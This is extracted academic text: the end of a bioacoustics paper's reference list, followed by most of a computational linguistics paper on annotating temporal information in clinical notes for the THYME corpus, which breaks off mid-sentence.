DOI 10.7717/peerj.103. Anderson SE, Dave AS, Margoliash D. 1996. Template-based automatic recognition of birdsong syllables from continuous recordings. The Journal of the Acoustical Society of America 100:1209–1219 DOI 10.1121/1.415968. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 21/23 https://peerj.com https://doi.org/10.6084/m9.figshare.4488149.v1 http://dx.doi.org/10.1016/j.ecoinf.2009.06.005 http://dx.doi.org/10.2193/0091-7648(2006)34[211:UADRSA]2.0.CO;2 http://dx.doi.org/10.7717/peerj.103 http://dx.doi.org/10.1121/1.415968 http://dx.doi.org/10.7717/peerj-cs.113 Blumstein DT, Mennill DJ, Clemins P, Girod L, Yao K, Patricelli G, Deppe JL, Krakauer AH, Clark C, Cortopassi KA, Hanser SF, McCowan B, Ali AM, Kirschel1 ANG. 2011. Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus. Journal of Applied Ecology 48(3):758–767 DOI 10.1111/j.1365-2664.2011.01993.x. Bradski G. 2000. The OpenCV Library. Doctor Dobbs Journal 25(11):120–126. Brandes ST. 2008. Automated sound recording and analysis techniques for bird surveys and conservation. Bird Conservation International 18:163–173 DOI 10.1017/S0959270908000415. Briggs F, Lakshminarayanan B, Neal L, Fern XZ, Raich R, Hadley SJK, Hadley AS, Betts MG. 2012. Acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. The Journal of the Acoustical Society of America 131(6):4640–4650 DOI 10.1121/1.4707424. Celis-Murillo A, Deppe JL, Ward MP. 2012. Effectiveness and utility of acoustic recordings for surveying tropical birds. Journal of Field Ornithology 83(2):166–179 DOI 10.1111/j.1557-9263.2012.00366.x. Chabot D. 1988. A quantitative technique to compare and classify humpback whale (Megaptera novaeangliae) sounds. Ethology 77(2):89–102 DOI 10.1111/j.1439-0310.1988.tb00195.x. Clark CW, Marler P, Beeman K. 1987. Quantitative analysis of animal vocal phonology: an application to swamp sparrow song. Ethology 76(2):101–115 DOI 10.1111/j.1439-0310.1987.tb00676.x. Fagerlund S. 2007. Bird species recognition using support vector machines. EURASIP Journal on Applied Signal Processing 2007(1):1–8. Fodor G. 2013. The ninth annual MLSP competition: first place. In: Machine learning for signal processing (MLSP), 2013 IEEE international workshop on IEEE, 1–2. Grigg G, Taylor A, Mc Callum H, Watson G. 1996. Monitoring frog communities: an application of machine learning. In: Proceedings of eighth innovative applications of artificial intelligence conference, Portland Oregon, 1564–1569. Gunasekaran S, Revathy K. 2010. Content-based classification and retrieval of wild animal sounds using feature selection algorithm. In: Second international conference on machine learning and computing.. Han NC, Muniandy SV, Dayou J. 2011. Acoustic classification of Australian anurans based on hybrid spectral-entropy approach. Applied Acoustics 72(9):639–645. Henderson E, Hildebrand JA, Smith MH. 2011. Classification of behavior using vocalizations of Pacific white-sided dolphins (Lagenorhynchus obliquidens). The Journal of the Acoustical Society of America 130(1):557–567. Lammers MO, Brainard RE, Au WWL, Mooney TA, Wong KB. 2008. An ecological acoustic recorder (EAR) for long-term monitoring of biological and anthropogenic sounds on coral reefs and other marine habitats. The Journal of the Acoustical Society of America 123:1720–1728 DOI 10.1121/1.2836780. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 22/23 https://peerj.com http://dx.doi.org/10.1111/j.1365-2664.2011.01993.x http://dx.doi.org/10.1017/S0959270908000415 http://dx.doi.org/10.1121/1.4707424 http://dx.doi.org/10.1111/j.1557-9263.2012.00366.x http://dx.doi.org/10.1111/j.1439-0310.1988.tb00195.x http://dx.doi.org/10.1111/j.1439-0310.1987.tb00676.x http://dx.doi.org/10.1121/1.2836780 http://dx.doi.org/10.7717/peerj-cs.113 Lasseck M. 2013. Bird song classification in field recordings: winning solution for NIPS4B 2013 competition. In: Proc. of int. symp. Neural Information Scaled for Bioacoustics, sabiod. org/nips4b, joint to NIPS, Nevada, 176–181. Marques TA, Thomas L, Martin SW, Mellinger DK, Ward JA, Moretti DJ, Harris D, Tyack PL. 2013. Estimating animal population density using passive acoustics. Biological Reviews 88(2):287–309 DOI 10.1111/brv.12001. Mellinger DK, Clark CW. 2000. Recognizing transient low-frequency whale sounds by spectrogram correlation. The Journal of the Acoustical Society of America 107:3518–3529 DOI 10.1121/1.429434. Sueur J, Pavoine S, Hamerlynck O, Duvail S. 2008. Rapid acoustic survey for biodiver- sity appraisal. PLOS ONE 3:e4065 DOI 10.1371/journal.pone.0004065. Taylor A. 1995. Bird flight call discrimination using machine learning. The Journal of the Acoustical Society of America 97(5):3370–3370. Terborgh J, Robinson SK, Parker III TA, Munn CA, Pierpont N. 1990. Structure and organization of an Amazonian forest bird community. Ecological Monographs 60:213–238 DOI 10.2307/1943045. Tricas TC, Boyle K. 2009. Validated reef fish sound scans of passive acoustic monitors on Hawaiian coral reefs [Abstract 2589]. The Journal of the Acoustical Society of America 125(4) DOI 10.1121/1.4783839. Van der Walt S, Schönberger JL, Nunez-Iglesias J, Boulogne F, Warner JD, Yager N, Gouillart E, Yu T, The Scikit-Image Contributors. 2014. scikit-image: image processing in Python. PeerJ 2:e453 DOI 10.7717/peerj.453. Villanueva-Rivera LJ, Pijanowski BC. 2012. Pumilio: a web-based management system for ecological recordings. Emerging Technologies 93:71–81 DOI 10.1890/0012-9623-93.1.71. Walther G-R, Post E, Convey P, Menzel A, Parmesan C, Beebee TJC, Fromentin J-M, Hoegh-Guldberg O, Bairlein F. 2002. Ecological responses to recent climate change. Nature 416(6879):389–395 DOI 10.1038/416389a. Wang Z, Bovik AC, Sheikh HR, Simoncelli EP. 2004. Image quality assessment: from error visibility to structural similarity. IEEE Transactions on Image Processing 13(4):600–612 DOI 10.1109/TIP.2003.819861. Xie J, Michael T, Zhang J, Roe P. 2016. Detecting frog calling activity based on acoustic event detection and multi-label learning. Procedia Computer Science 80:627–638 DOI 10.1016/j.procs.2016.05.352. Zhang L, Towsey M, Xie J, Zhang J, Roe P. 2016. Using multi-label classification for acoustic pattern detection and assisting bird species surveys. Applied Acoustics 110:91–98 DOI 10.1016/j.apacoust.2016.03.027. Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 23/23 https://peerj.com http://dx.doi.org/10.1111/brv.12001 http://dx.doi.org/10.1121/1.429434 http://dx.doi.org/10.1371/journal.pone.0004065 http://dx.doi.org/10.2307/1943045 http://dx.doi.org/10.1121/1.4783839 http://dx.doi.org/10.7717/peerj.453 http://dx.doi.org/10.1890/0012-9623-93.1.71 http://dx.doi.org/10.1038/416389a http://dx.doi.org/10.1109/TIP.2003.819861 http://dx.doi.org/10.1016/j.procs.2016.05.352 http://dx.doi.org/10.1016/j.apacoust.2016.03.027 http://dx.doi.org/10.7717/peerj-cs.113 work_dtddctbq2beehlcouaw3kzhtfm ---- UC San Diego UC San Diego Previously Published Works Title Temporal Annotation in the Clinical Domain. Permalink https://escholarship.org/uc/item/9sk3m36q Journal Transactions of the Association for Computational Linguistics, 2 ISSN 2307-387X Authors Styler, William F Bethard, Steven Finan, Sean et al. Publication Date 2014-04-01 DOI 10.1162/tacl_a_00172 Peer reviewed eScholarship.org Powered by the California Digital Library University of California https://escholarship.org/uc/item/9sk3m36q https://escholarship.org/uc/item/9sk3m36q#author https://escholarship.org http://www.cdlib.org/ Temporal Annotation in the Clinical Domain William F. Styler IV1, Steven Bethard2, Sean Finan3, Martha Palmer1, Sameer Pradhan3, Piet C de Groen4, Brad Erickson4, Timothy Miller3, Chen Lin3, Guergana Savova3 and James Pustejovsky5 1 Department of Linguistics, University of Colorado at Boulder 2 Department of Computer and Information Sciences, University of Alabama at Birmingham 3 Children’s Hospital Boston Informatics Program and Harvard Medical School 4 Mayo Clinic College of Medicine, Mayo Clinic, Rochester, MN 5 Department of Computer Science, Brandeis University Abstract This article discusses the requirements of a formal specification for the annotation of temporal information in clinical narratives. We discuss the implementation and extension of ISO-TimeML for annotating a corpus of clinical notes, known as the THYME cor- pus. To reflect the information task and the heavily inference-based reasoning demands in the domain, a new annotation guideline has been developed, “the THYME Guidelines to ISO-TimeML (THYME-TimeML)”. To clarify what relations merit annotation, we distinguish between linguistically-derived and inferentially-derived temporal orderings in the text. We also apply a top performing Temp- Eval 2013 system against this new resource to measure the difficulty of adapting systems to the clinical domain. The corpus is available to the community and has been proposed for use in a SemEval 2015 task. 1 Introduction There is a long-standing interest in temporal reason- ing within the biomedical community (Savova et al., 2009; Hripcsak et al., 2009; Meystre et al., 2008; Bramsen et al., 2006; Combi et al., 1997; Keravnou, 1997; Dolin, 1995; Irvine et al., 2008; Sullivan et al., 2008). This interest extends to the automatic ex- traction and interpretation of temporal information from medical texts, such as electronic discharge sum- maries and patient case summaries. Making effective use of temporal information from such narratives is a crucial step in the intelligent analysis of informat- ics for medical researchers, while an awareness of temporal information (both implicit and explicit) in a text is also necessary for many data mining tasks. It has also been demonstrated that the temporal in- formation in clinical narratives can be usefully mined to provide information for some higher-level tempo- ral reasoning (Zhao et al., 2005). Robust temporal understanding of such narratives, however, has been difficult to achieve, due to the complexity of deter- mining temporal relations among events, the diver- sity of temporal expressions, and the interaction with broader computational linguistic issues. Recent work on Electronic Health Records (EHRs) points to new ways to exploit and mine the informa- tion contained therein (Savova et al., 2009; Roberts et al., 2009; Zheng et al., 2011; Turchin et al., 2009). We target two main use cases for extracted data. First, we hope to enable interactive displays and summaries of the patient’s records to the physician at the time of visit, making a comprehensive review of the patient’s history both faster and less prone to oversights. Sec- ond, we hope to enable temporally-aware secondary research across large databases of medical records (e.g., “What percentage of patients who undergo pro- cedure X develop side-effect Y within Z months?”). Both of these applications require the extraction of time and date associations for critical events and the relative ordering of events during the patient’s period of care, all from the various records which make up a patient’s EHR. Although we have these two specific applications in mind, the schema we have developed is generalizable and could potentially be embedded in a wide variety of biomedical use cases. Narrative texts in EHRs are temporally rich doc- uments that frequently contain assertions about the timing of medical events, such as visits, laboratory values, symptoms, signs, diagnoses, and procedures (Bramsen et al., 2006; Hripcsak et al., 2009; Zhou et al., 2008). Temporal representation and reason- ing in the medical record are difficult due to: (1) the diversity of time expressions; (2) the complexity of determining temporal relations among events (which are often left to inference); (3) the difficulty of han- dling the temporal granularity of an event; and (4) 143 Transactions of the Association for Computational Linguistics, 2 (2014) 143–154. Action Editor: Ellen Riloff. Submitted 9/2013; Revised 2/2014; Published 4/2014. c©2014 Association for Computational Linguistics. general issues in natural language processing (e.g., ambiguity, anaphora, ellipsis, conjunction). As a re- sult, the signals used for reconstructing a timeline can be both domain-specific and complex, and are often left implicit, requiring significant domain knowledge to accurately detect and interpret. In this paper, we discuss the demands on accurately annotating such temporal information in clinical notes. We describe an implementation and extension of ISO-TimeML (Pustejovsky et al., 2010), devel- oped specifically for the clinical domain, which we refer to as the “THYME Guidelines to ISO-TimeML” (“THYME-TimeML”), where THYME stands for “Temporal Histories of Your Medical Events”. A sim- plified version of these guidelines formed the basis for the 2012 i2b2 medical-domain temporal relation challenge (Sun et al., 2013a). This is being developed in the context of the THYME project, whose goal is to both create ro- bust gold standards for semantic information in clini- cal notes, as well as to develop state-of-the-art algo- rithms to train and test on this dataset. Deriving timelines from news text requires the con- crete realization of context-dependent assumptions about temporal intervals, orderings and organization, underlying the explicit signals marked in the text (Pustejovsky and Stubbs, 2011). Deriving patient history timelines from clinical notes also involves these types of assumptions, but there are special de- mands imposed by the characteristics of the clinical narrative. Due to both medical shorthand practices and general domain knowledge, many event-event relations are not signaled in the text at all, and rely on a shared understanding and common conceptual models of the progressions of medical procedures available only to readers familiar with language use in the medical community. Identifying these implicit relations and temporal properties puts a heavy burden on the annotation process. As such, in the THYME-TimeML guideline, considerable effort has gone into both describing and proscribing the annotation of temporal orderings that are inferable only through domain-specific temporal knowledge. Although the THYME guidelines describe a num- ber of departures from the ISO-TimeML standard for expediency and ease of annotation, this paper will focus on those differences specifically motivated by the needs of the clinical domain, and on the conse- quences for systems built to extract temporal data in both the clinical and general domain. 2 The Nature of Clinical Documents In the THYME corpus, we have been examining 1,254 de-identified1 notes from a large healthcare practice (the Mayo Clinic), representing two distinct fields within oncology: brain cancer, and colon can- cer. To date, we have principally examined two dif- ferent general types of clinical narrative in our EHRs: clinical notes and pathology reports. Clinical notes are records of physician interactions with a patient, and often include multiple, clearly delineated sections detailing different aspects of the patient’s care and present illness. These notes are fairly generic across institutions and specialities, and although some terms and inferences may be specific to a particular type of practice (such as oncology), they share a uniform structure and pattern. The ‘His- tory of Present Illness’, for example, summarizes the course of the patient’s chief complaint, as well as the interventions and diagnostics which have been thus far attempted. In other sections, the doctor may out- line her current plan for the patient’s treatment, then later describe the patient’s specific medical history, allergies, care directives, and so forth. Most critically for temporal reasoning, each clin- ical note reflects a single time in the patient’s treat- ment history at which all of the doctor’s statements are accurate (the DOCTIME), and each section tends to describe events of a particular timeframe. For example, ‘History of Present illness’ predominantly describes events occuring before DOCTIME, whereas ‘Medications’ provides a snapshot at DOCTIME and ‘Ongoing Care Orders’ discusses events which have not yet occurred.2 Clinical notes contain rich temporal information and background, moving fluidly from prior treat- ments and symptoms to present conditions to future interventions. They are also often rich with hypo- thetical statements (“if the tumor recurs, we can...”), each of which can form its own separate timeline. By constrast, pathology notes are quite different. Such notes are generated by a medical pathologist 1Although most patient information was removed, dates and temporal information were not modified according to this project’s specific data use agreement. 2One complication is the propensity of doctors and automated systems to later update sections in a note without changing the timestamp or metadata. We have added a SECTIONTIME to keep these updated sections from affecting our overall timeline. 144 upon receipt and analysis of specimens (ranging from tissue samples from biopsy to excised portions of tumor or organs). Pathology notes provide crucial information to the patient’s doctor confirming the malignancy (cancer) in samples, describing surgi- cal margins (which indicate whether a tumor was completely excised), and classifying and ‘staging’ a tumor, describing the severity and spread of the can- cer. Because the information in such notes pertains to samples taken at a single moment in time, they are temporally sparse, seldom referring to events before or after the examination of the specimen. However, they contain critical information about the state of the patient’s illness and about the cancer itself, and must be interpreted to understand the history of the patient’s illness. Most importantly, in all EHRs, we must contend with the results of a fundamental tension in mod- ern medical records: hyper-detailed records provide a crucial defense against malpractice litigation, but including such detail takes enormous time, which doctors seldom have. Given that these notes are writ- ten by and for medical professionals (who form a relatively insular speech community), a great many non-standard expressions, abbreviations, and assump- tions of shared knowledge are used, which are simul- taneously concise and detail-rich for others who have similar backgrounds. These time-saving devices can range from tempo- rally loaded acronyms (e.g., ‘qid’, Latin for quater in die, ‘four times daily’), to assumed orderings (a diag- nostic test for a disorder is assumed to come before the procedure which treats it), and even to completely implicit events and temporal details. For example, consider the sentence in (1). (1) Colonoscopy 3/12/10, nodule biopsies negative We must understand that during the colonoscopy, the doctor obtained biopsies of nodules, which were packaged and sent to a pathologist, who reviewed them and determined them to be ‘negative’ (non- cancerous). In such documents, we must recover as much tem- poral detail as possible, even though it may be ex- pressed in a way which is not easily understood out- side of the medical community, let alone by linguists or automated systems. We must also be aware of the legal relevance of some events (e.g., “We discussed the possible side effects”), even when they may not seem relevant to the patient’s actual care. Finally, each specialty and note type has separate conventions. Within colon cancer notes, the Amer- ican Joint Committee on Cancer (AJCC) Staging Codes (e.g., T4N1, indicating the nature of the tumor, lymph node and metastasis involvement) are metic- ulously recorded, but are largely absent in the brain cancer notes which make up the second corpus in our project. So, although clinical notes share many similarities, annotators without sufficient domain ex- pertise may require additional training to adapt to the inferences and nuances of a new clinical subdomain. 3 Interpreting ‘Event’ and Temporal Expressions in the Clinical Domain Much prior work has been done on standardizing the annotation of events and temporal expressions in text. The most widely used approach is the ISO- TimeML specification (Pustejovsky et al., 2010), an ISO standard that provides a common framework for annotating and analyzing time, events, and event rela- tions. As defined by ISO-TimeML, an EVENT refers to anything that can be said “to obtain or hold true, to happen or to occur”. This is a broad notion of event, consistent with Bach’s use of the term “eventuality” (Bach, 1986) as well as the notion of fluents in AI (McCarthy, 2002). Because the goals of the THYME project involve automatically identifying the clinical timeline for a patient from clincal records, the scope of what should be admitted into the domain of events is inter- preted more broadly than in ISO-TimeML3. Within the THYME-TimeML guideline, an EVENT is any- thing relevant to the clinical timeline, i.e., anything that would show up on a detailed timeline of the pa- tient’s care or life. The best single-word syntactic head for the EVENT is then used as its span. For example, a diagnosis would certainly appear on such a timeline, as would a tumor, illness, or procedure. On the other hand, entities that persist throughout the relevant temporal period of the clinical timeline (endurants in ontological circles) would not be con- sidered as event-like. This includes the patient, other humans mentioned (the patient’s mother-in-law or the doctor), organizations (the emergency room), non-anatomical objects (the patient’s car), or indi- vidual parts of the patient’s anatomy (an arm is not an EVENT unless missing or otherwise notable). To meet our explicit goals, the THYME-TimeML guideline introduces two additional levels of interpre- 3Our use of the term ‘EVENT’ corresponds with the less specific ISO-TimeML term ‘Eventuality’ 145 tation beyond that specified by ISO-TimeML: (i) a well-defined task; and (ii) a clearly identified domain. By focusing on the creation of a clinical timeline from clinical narrative, the guideline imposes con- straints that cannot be assumed for a broadly defined and domain independent annotation schema. Some EVENTs annotated under our guideline are considered meaningful and eventive mostly by virtue of a specific clinical or legal value. For example, AJCC Staging Codes (discussed in Section 2) are eventive only in the sense of the code being assigned to a tumor at a given moment in the patient’s care. However, they are of such critical importance and informative value to doctors that we have chosen to annotate them specifically so that they will show up on the patient’s timeline in a clinical setting. Similarly, because of legal pressures to establish in- formed consent and patient knowledge of risk, entire paragraphs of clinical notes are dedicated to docu- menting the doctor’s discussion of risks, plans, and alternative strategies. As such, we annotate verbs of discussion (“We talked about the risks of this drug”), consent (“She agreed with the current plan”), and comprehension (“Mrs. Larsen repeated the potential side effects back to me”), even though they are more relevant to legal defense than medical treatment. It is also because of this grounding in clinical lan- guage that entities and other non-events are often interpreted in terms of their associated eventive prop- erties. There are two major types for which this is a significant shift in semantic interpretation: (2) a Medication as Event: Orders: Lariam twice daily. b Disorder as Event: Tumor of the left lung. In both these cases, entities which are not typically marked as events are identified as such, because they contribute significant information to the clinical time- line being constructed. In (2a), for example, the TIMEX3 “twice daily” is interpreted as scoping over the eventuality of the patient taking the medication, not the prescription event. In sentence (2b), the “tu- mor” is interpreted as a stative eventuality of the patient having a tumor located within an anatomical region, rather than an entity within an entity. Within the medical domain, these eventive inter- pretations of medications, growths and status codes are unambiguous and consistent. Doctors in clini- cal notes (unlike in biomedical research texts) do not discuss medications without an associated (im- plicit) administering EVENT (though some mentions may be hypothetical, generic or negated). Similarly, mentions of symptoms or disorders reflect occur- rences in a patient’s life, rather than abstract entities. With these interpretations in mind, we can safely in- fer, for instance, that all UMLS (Unified Medical Language System, (Bodenreider, 2004)) entities of the types Disorder, Chemical/Drug, Procedure and Sign/Symptom will be EVENTs. In general, in the medical domain, it is essential to read “between the lines” of the shorthand expressions used by the doctors, and recognize implicit events that are being referred to by specific anatomical sites or medications. 4 Modifications to ISO-TimeML for the Clinical Domain Overall, we have found that the specification required for temporal annotation in the clinical domain does not require substantial modification from existing specifications for the general domain. The clinical domain includes no shortage of inferences, short- hands, and unusual use of language, but the structure of the underlying timeline is not unique. As a result of this, we have been able to adopt most of the framework from ISO-TimeML, adapting the guidelines where needed, as well as reframing the focus of what gets annotated. This is reflected in a comprehensive guideline, incorporating the specific patterns and uses of events and temporal expressions as seen in clinical data. This approach allows the resulting annotations to be interoperable with exist- ing solutions, while still accommodating the major differences in the nature of the texts. Our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org4 Our extensions of the ISO-TimeML specification to the clinical domain are intended to address specific constructions, meanings, and phenomena in medical texts. Our schema differs from ISO-TimeML in a few notable ways. EVENT Properties We have both simplified the ISO-TimeML coding of EVENTs, and extended it to meet the needs of the clinical domain and the specific language goals of the clinical narrative. 4Access to the corpus will require a data use agreement. More information about this process is available from the corpus website. 146 Consider, for example, how modal subordination is handled in ISO-TimeML. This involves the semantic characterization of an event as “likely”, “possible”, or as presented by observation, evidence, or hearsay. All of these are accounted for compositionally in ISO- TimeML within the SLINK (Subordinating Link) relation (Pustejovsky et al., 2005). While accept- ing ISO-TimeML’s definition of event modality, we have simplified the annotation task within the cur- rent guideline, so that EVENTs now carry attributes for “contextual modality”, “contextual aspect” and “permanence”. Contextual modality allows the values ACTUAL, HYPOTHETICAL, HEDGED, and GENERIC. ACTUAL covers EVENTs which have actually happened, e.g., “We’ve noted a tumor”. HYPOTHETICAL covers con- ditionals and possibilities, e.g., “If she develops a tumor”. HEDGED is for situations where doctors proffer a diagnosis, but do so cautiously, to avoid legal liability for an incorrect diagnosis or for over- looking a correct one. For example: (3) a. The signal in the MRI is not inconsistent with a tumor in the spleen. b. The rash appears to be measles, awaiting antibody test to confirm. These HEDGED EVENTs are more real than a hypo- thetical diagnosis, and likely merit inclusion on a timeline as part of the diagnostic history, but must not be conflated with confirmed fact. These (and other forms of uncertainty in the medical domain) are discussed extensively in (Vincze et al., 2008). In contrast, GENERIC EVENTs do not refer to the pa- tient’s illness or treatment, but instead discuss illness or treatment in general (often in the patient’s specific demographic). For example: (4) In other patients without significant comor- bidity that can tolerate adjuvant chemother- apy, there is a benefit to systemic adjuvant chemotherapy. These sections would be true if pasted into any pa- tient’s note, and are often identical chunks of text repeatedly used to justify a course of action or treat- ment as well as to defend against liability. Contextual Aspect (to distinguish from grammati- cal aspect), allows the clinically-necessary category, INTERMITTENT. This serves to distinguish intermit- tent EVENTs (such as vomiting or seizures) from constant, more stative EVENTs (such as fever or sore- ness). For example, the bolded EVENT in (5a) would be marked as INTERMITTENT, while that in (5b) would not: (5) a She has been vomiting since June. b She has had swelling since June. In the first case, we assume that her vomiting has been intermittent, i.e., there were several points since June in which she was not actively vomiting. In the second case, unless made otherwise explicit (“she has had occasional swelling”), we assume that swelling was a constant state. This property is also used when a particular instance of an EVENT is intermittent, even though it generally would not be: (6) Since starting her new regime, she has had occa- sional bouts of fever, but is feeling much better. The permanence attribute has two values, FINITE and PERMANENT. Permanence is a property of dis- eases themselves, roughly corresponding to the med- ical concept of “chronic” vs. “acute” disease, which marks whether a disease is persistent following diag- nosis. For example, a (currently) uncurable disease like Multiple Sclerosis would be classed as PERMA- NENT, and thus, once mentioned in a patient’s note, will be assumed to persist through the end of the patient’s timeline. This is compared with FINITE disorders like “Influenza” or “fever”, which, if not mentioned in subsequent notes, should be considered cured and no longer belongs on the patient’s time- line. Because it requires domain-specific knowledge, although present in the specification, Permanence is not currently annotated. However, annotators are trained on the basic idea and told about subsequent axiomatic assignment. The addition of this property to our schema is designed to relieve annotators of any feeling of obligation to express this inferred informa- tion in some other way. TIMEX3 Types Temporal expressions (TIMEX3s) in the clinical domain function the same as in the gen- eral linguistic community, with two notable excep- tions. ISO-TimeML SETs (statements of frequency) occur quite frequently in the medical domain, par- ticularly with regard to medications and treatments. Medication sections within notes often contain long lists of medications, each with a particular associated set (“Claritin 30mg twice daily”), and further tempo- ral specification is not uncommon (e.g., “three times per day at meals”, “once a week at bedtime”). The second major change for the medical domain is a new type of TIMEX3 which we call PREPOS- TEXP. This covers temporally complex terms like 147 “preoperative”, “postoperative”, and “intraoperative”. These temporal expressions designate a span of time bordered, usually only on one side, by the incorpo- rated event (an operation, in the previous EVENTs). In many cases, the referent is clear: (7) She underwent hemicolectomy last week, and had some postoperative bleeding. Here we understand that “postoperative” refers to “the period of time following the hemicolectomy”. In these cases, the PREPOSTEXP makes explicit a tempo- ral link between the bleeding and the hemicolectomy. In other cases, no clear referent is present: (8) Patient shows some post-procedure scarring. In these situations, where no procedure is mentioned (or the reference is never explicitly resolved), we treat the PREPOSTEXP as a narrative container (see Section 5), covering the span of time following the unnamed procedure. Finally, it is worth noting that the process of nor- malizing those TIMEX3s is significantly more com- plex relative to the general domain, because many temporal expressions are anchored not to dates or times, but to other EVENTs (whose dates are often not mentioned or not known by the physician). As we move towards a complete system, we are working to expand the ISO-TimeML system for TIMEX3 nor- malization to allow some value to be assigned to a phrase like “in the months after her hemicolectomy” when no referent date is present. ISO-TimeML, in discussion with ISO TC 37SC 4, plans to reference to such TIMEX3s in a future release of the standard. 5 Temporal Ordering and Narrative Containers The semantic content and informational impact of a timeline is encoded in the ordering relations that are identified between the temporal and event expres- sions present in clinical notes. ISO-TimeML speci- fies the standard thirteen “Allen relations” from the interval calculus (Allen, 1983), which it refers to as TLINK values. For unguided, general-purpose annota- tion, the number of relations that could be annotated grows quadratically with the number of events and times, and the task quickly becomes unmanageable. There are, however, strategies that we can adopt to make this labeling task more tractable. Temporal ordering relations in text are of three kinds: 1. Relations between two events 2. Relations between two times 3. Relations between a time and an event. ISO-TimeML, as a formal specification of the tem- poral information conveyed in language, makes no distinction between these ordering types. Humans, however, do make distinctions, based on local tempo- ral markers and the discourse relations established in a narrative (Miltsakaki et al., 2004; Poesio, 2004). Because of the difficulty of humans capturing ev- ery relationship present in the note (and the disagree- ment which arises when annotators attempt to do so), it is vital that the annotation guidelines describe an approach that reduces the number of relations that must be considered, but still results in maximally in- formative temporal links. We have found that many of the weaknesses in prior annotation approaches stem from interaction between two competing goals: • The guideline should specify certain types of an- notations that should be performed; • The guideline should not force annotations to be performed when they need not be. Failing in the first goal will result in under-annotation and the neglect of relations which provide necessary information for inference and analysis. Failure in the second goal results in over-annotation, creating com- plex webs of temporal relations which yield mostly inferable information, but which complicate annota- tion and adjudication considerably. Our method of addressing both goals in tempo- ral relations annotation is that of the narrative con- tainer, discussed in Pustejovsky and Stubbs (2011). A narrative container can be thought of as a temporal bucket into which an EVENT or series of EVENTs may fall, or a natural cluster of EVENTs around a given time or situation. These narrative containers are often represented (or “anchored”) by dates or other temporal expressions (within which a variety of different EVENTs occur), although they can also be anchored to more abstract concepts (“recovery” which might involve a variety of EVENTs) or even durative EVENTs (many other EVENTs can occur dur- ing a surgery). Rather than marking every possible TLINK between each EVENT, we instead try to link all EVENTs to their narrative containers, and then link those containers so that the contained EVENTs can be linked by inference. First, annotators assign each event to one of four broad narrative containers: before the DOCTIME, be- fore and overlapping the DOCTIME, just overlapping the DOCTIME or after the DOCTIME. This narrative 148 container is identified by the EVENT attribute Doc- TimeRel. After the assignment of DocTimeRel, the remainder of the narrative container relations must be specified using temporal links (TLINKs). There are five different temporal relations used for such TLINKs: BEFORE, OVERLAP, BEGINS-ON, ENDS-ON and CONTAINS5. Due to our narrative container ap- proach, CONTAINS is the most frequent relation by a large margin. EVENTs serving as narrative container anchors are not tagged as containers per-se. Instead, annotators use the narrative container idea to help them visu- alize the temporal relations within a document, and then make a series of CONTAINS TLINK annotations which establish EVENTs and TIMEX3s as anchors, and specify their contents. If the annotators do their jobs correctly, properly implementing DocTimeRel and creating accurate TLINKs, a good understanding of the narrative containers present in a document will naturally emerge from the annotated text. The major advantage introduced with narrative containers is this: a narrative event is placed within a bounding temporal interval which is explicitly men- tioned in the text. This allows EVENTs within sep- arate containers to be linked by post-hoc inference, temporal reasoning, and domain knowledge, rather than by explicit (and time-consuming) one-by-one temporal relations annotation. A secondary advantage is that this approach works nicely with the general structure of story-telling in both the general and clinical domains, and provides a compelling and useful metaphor for interpreting time- lines. Often, especially in clinical histories, doctors will cluster discussions of symptoms, interventions and diagnoses around a given date (e.g. a whole para- graph starting “June 2009:”), a specific hospitaliza- tion (“During her January stay at Mercy”), or a given illness or treatment (“While she underwent Chemo”). Even when specific EVENTs are not explicitly or- dered within a cluster (often because the order can be easily inferred with domain knowledge), it is often quite easy to place the EVENTs into containers, and just a few TLINKs can order the containers relative to one another with enough detail to create a clinically useful understanding of the overall timeline. Narrative containers also allow the inference of re- lations between sub-events within nested containers: 5This is a subset of the ISO-TimeML TLINK types, excluding those seldom occurring in medical records, like ‘simultaneous’ as well as inverse relations like ‘during’ or ‘after’. (9) December 19th: The patient underwent an MRI and EKG as well as emergency surgery. Dur- ing the surgery, the patient experienced mild tachycardia, and she also bled significantly during the initial incision. 1. December 19th CONTAINS MRI 2. December 19th CONTAINS EKG 3. December 19th CONTAINS surgery a. surgery CONTAINS tachycardia b. surgery CONTAINS incision c. incision CONTAINS bled Through our container nesting, we can automatically infer that ‘bled’ occurred on December 19th (because ‘19th’ CONTAINS ‘surgery’ which CONTAINS ‘inci- sion’ which CONTAINS ‘bled’). This also allows the capture of EVENT/sub-event relations, and the rapid expression of complex temporal interactions. 6 Explicit vs. Inferable Annotation Given a specification language, there are essentially two ways of introducing the elements into the docu- ment (data source) being annotated:6 • Manual annotation: Elements are introduced into the document directly by the human annotator fol- lowing the guideline. • Automatic (inferred) annotation: Elements are cre- ated by applying an automated procedure that in- troduces new elements that are derivable from the human annotations. As such, there is a complex interaction between spec- ification and guideline, and we focus on how the clinical annotation task has helped shape and refine the annotation guidelines. It is important to note that an annotation guideline does not necessarily force the markup of certain elements in a text, even though the specification language (and the eventual goal of the project) might require those annotations to exist. In some cases, these added annotations are derived logically from human annotations. Explicitly marked temporal relations can be used to infer others that are not marked but exist implicitly through closure. For instance, given EVENTs A, B and C and TLINKs ‘A BEFORE B’ and ‘B BEFORE C’, the TLINK ‘A BE- FORE C’ can be automatically inferred. Repeatedly applying such inference rules allows all inferable 6We ignore the application of automatic techniques, such as classifiers trained on external datasets, as our focus here is on the preparation of the gold standard used for such classifiers. 149 TLINKs to be generated (Verhagen, 2005). We can use this idea of closure to show our annotators which annotations need not be marked explicitly, saving time and effort. We have also incorporated these clo- sure rules into our inter-annotator agreement (IAA) calculation for temporal relations, described further in Section 7.2. The automatic application of rules following the annotation of the text is not limited to the marking of logically inferable relations or EVENTs. In the clinical domain, the combination of within-group shared knowledge and pressure towards concise writ- ing leads to a number of common, inferred relations. Take, for example, the sentence: (10) Jan 2013: Colonoscopy, biopsies. Pathology showed adenocarcinoma, resected at Mercy. Diagnosis T3N1 Adenocarcinoma. In this sentence, only the CONTAINS relations be- tween “Jan 2013” and the EVENTs (in bold) are explicitly stated. However, based on the known progression-of-care for colon cancer, we can infer that the colonoscopy occurs first, biopsies occur dur- ing the colonoscopy, pathology happens afterwards, a diagnosis (here, adenocarcinoma) is returned 